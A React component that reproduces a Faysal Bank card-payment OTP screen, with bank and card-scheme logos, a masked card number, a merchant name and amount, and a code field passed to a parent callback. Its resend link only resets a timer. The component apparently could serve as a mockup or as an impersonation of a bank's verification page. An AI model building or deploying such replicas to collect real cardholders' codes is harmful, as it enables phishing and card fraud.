import React, { useEffect, useState, useRef } from 'react';
interface OTPFormProps {
  onSubmit: (otp: string) => void;
  onCancel: () => void;
  phoneNumber?: string;
  merchantName?: string;
  amount?: number;
  cardLast4?: string;
  cardScheme?: string;
}
export function OTPForm({
  onSubmit,
  onCancel,
  phoneNumber = '****-***890',
  merchantName = 'www.gadgetszone.pk',
  amount,
  cardLast4 = '****',
  cardScheme = 'Visa'
}: OTPFormProps) {
  const [otp, setOtp] = useState('');
  const [error, setError] = useState('');
  const [timeLeft, setTimeLeft] = useState(120);
  const inputRef = useRef<HTMLInputElement | null>(null);
  useEffect(() => {
    if (inputRef.current) {
      inputRef.current.focus();
    }
  }, []);
  useEffect(() => {
    if (timeLeft > 0) {
      const timerId = setTimeout(() => setTimeLeft(timeLeft - 1), 1000);
      return () => clearTimeout(timerId);
    }
  }, [timeLeft]);
  const getCardSchemeLogoUrl = (scheme: string): string => {
    switch (scheme) {
      case 'Visa':
        return 'https://cdn.magicpatterns.com/uploads/8dFj1ebd13MwAe3XqFYNrR/Visa_Logo.png';
      case 'Mastercard':
        return 'https://cdn.magicpatterns.com/uploads/qD9CTacyXTdwXXPtrCxZQw/MasterCard_Logo.png';
      case 'UnionPay':
        return 'https://cdn.magicpatterns.com/uploads/8TcgwChg7bMUnkD6TfzVkn/UnionPay_Logo.png';
      case 'PayPak':
        return 'https://cdn.magicpatterns.com/uploads/u4UiZ3PWX5VH4BCbbcVNsE/PayPak_Logo.png';
      default:
        return 'https://cdn.magicpatterns.com/uploads/8dFj1ebd13MwAe3XqFYNrR/Visa_Logo.png';
    }
  };
  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (otp.length < 4) {
      setError('Please enter the complete OTP code');
      return;
    }
    onSubmit(otp);
  };
  const handleResend = () => {
    setOtp('');
    setTimeLeft(120);
    setError('');
    inputRef.current?.focus();
  };
  const maskedCardNumber = `************${cardLast4}`;
  const formattedAmount = amount ? `Rs.${amount.toLocaleString()} PKR` : 'Rs.0 PKR';
  return <div className="text-left" data-id="element-460" data-mp="re0fto4wjpo6">
      {/* Bank + Card Scheme Header */}
      <div className="flex items-center justify-between mb-8 pb-4 border-b border-gray-200" data-id="element-461" data-mp="mh9zczp6qs28">
        <img src="https://cdn.magicpatterns.com/uploads/v8C51oisyXciWLb3udKWyn/Faysal_Bank_Logo.png" alt="Faysal Bank" className="h-10 object-contain" data-id="element-462" data-mp="10gi3m707gqda" />
        <img src={getCardSchemeLogoUrl(cardScheme)} alt={cardScheme} className="h-12 object-contain" data-id="element-463" data-mp="vf2g88ak27rq" />
      </div>

      {/* Description */}
      <p className="text-sm text-gray-700 leading-relaxed mb-8" data-id="element-464" data-mp="3qitw98bjlt4">
        Please Enter your one-time password in the field below to confirm your
        identity for this purchase. This information is not shared with the
        merchant.
      </p>

      {/* Transaction Details */}
      <form onSubmit={handleSubmit} data-id="element-465" data-mp="3l67hagp6a64e">
        <div className="mb-6" data-id="element-466" data-mp="3l5fn9ab84gg8">
          <h3 className="text-sm font-semibold text-gray-500 mb-4 uppercase tracking-wide" data-id="element-467" data-mp="3l4e9gy2tpfut">
            Transaction Details
          </h3>

          <table className="w-full text-sm" data-id="element-468" data-mp="1votth4rm0bv9">
            <tbody data-id="element-469" data-mp="1vo280mrq7uip">
              <tr data-id="element-470" data-mp="1vnipp4y5z445">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap w-[45%]" data-id="element-471" data-mp="20ftpm7swmpwp">
                  Merchant:
                </td>
                <td className="py-2 text-gray-700" data-id="element-472" data-mp="1mq8etkp9dgzr">{merchantName}</td>
              </tr>
              <tr data-id="element-473" data-mp="1rojo9ubn5phg">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap" data-id="element-474" data-mp="1ro0406yiqp09">
                  Transaction Amount:
                </td>
                <td className="py-2 text-gray-700" data-id="element-475" data-mp="2jf7moylxkgrf">{formattedAmount}</td>
              </tr>
              <tr data-id="element-476" data-mp="25fohadki7jit">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap" data-id="element-477" data-mp="25e3mqny6w0ky">
                  Card Number:
                </td>
                <td className="py-2 text-gray-700 font-mono" data-id="element-478" data-mp="2ag2ra15o13jh">
                  {maskedCardNumber}
                </td>
              </tr>
              <tr data-id="element-479" data-mp="yzcoks0gatum">
                <td className="py-2 pr-4 text-right font-bold text-gray-800 whitespace-nowrap align-middle" data-id="element-480" data-mp="yzvvldokbxtv">
                  Enter Code:
                </td>
                <td className="py-2" data-id="element-481" data-mp="19i9h15xpbho1">
                  <input ref={inputRef} type="password" inputMode="numeric" maxLength={10} value={otp} onChange={e => {
                  setOtp(e.target.value.replace(/\D/g, '').slice(0, 10));
                  setError('');
                }} className={`w-40 px-3 py-2 border text-base font-mono tracking-widest focus:ring-2 focus:ring-blue-500 focus:border-blue-500 transition-all ${error ? 'border-red-500 bg-red-50' : 'border-gray-400 bg-white'}`} placeholder="" data-id="element-482" data-mp="19h7vu8mz1esl" />
                </td>
              </tr>
            </tbody>
          </table>
        </div>

        {error && <p className="text-sm text-red-600 mb-4 text-center" data-id="element-483" data-mp="1j8c8v2t36pks">{error}</p>}

        {/* Resend Link */}
        <div className="mb-6" data-id="element-484" data-mp="csa0opbb7euw">
          {timeLeft > 0 ? <button type="button" disabled className="text-sm text-gray-400 underline cursor-not-allowed" data-id="element-485" data-mp="ct1rlmtyooeu">
              Click here to receive another code ({timeLeft}s)
            </button> : <button type="button" onClick={handleResend} className="text-sm text-blue-700 underline hover:text-blue-900 transition-colors" data-id="element-486" data-mp="3tvo77x3crzr2">
              Click here to receive another code
            </button>}
        </div>

        {/* Submit Button */}
        <div className="flex justify-center mb-6" data-id="element-487" data-mp="cdd4h3td9vn0">
          <button type="submit" className="px-10 py-2.5 bg-gray-900 text-white text-sm font-medium hover:bg-black focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-gray-900 transition-colors" data-id="element-488" data-mp="cf6acgw5obty">
            Submit
          </button>
        </div>

        {/* Footer Links */}
        <div className="flex items-center justify-between pt-4 border-t border-gray-200" data-id="element-489" data-mp="qephb6d8dh4o">
          <button type="button" className="text-sm text-gray-800 underline font-medium hover:text-gray-600 transition-colors" data-id="element-490" data-mp="vbfyjx0ruiro">
            Terms of Use
          </button>
          <button type="button" onClick={onCancel} className="text-sm text-gray-800 underline font-medium hover:text-gray-600 transition-colors" data-id="element-491" data-mp="2x3kpb56jba0t">
            Exit
          </button>
        </div>
      </form>
    </div>;
}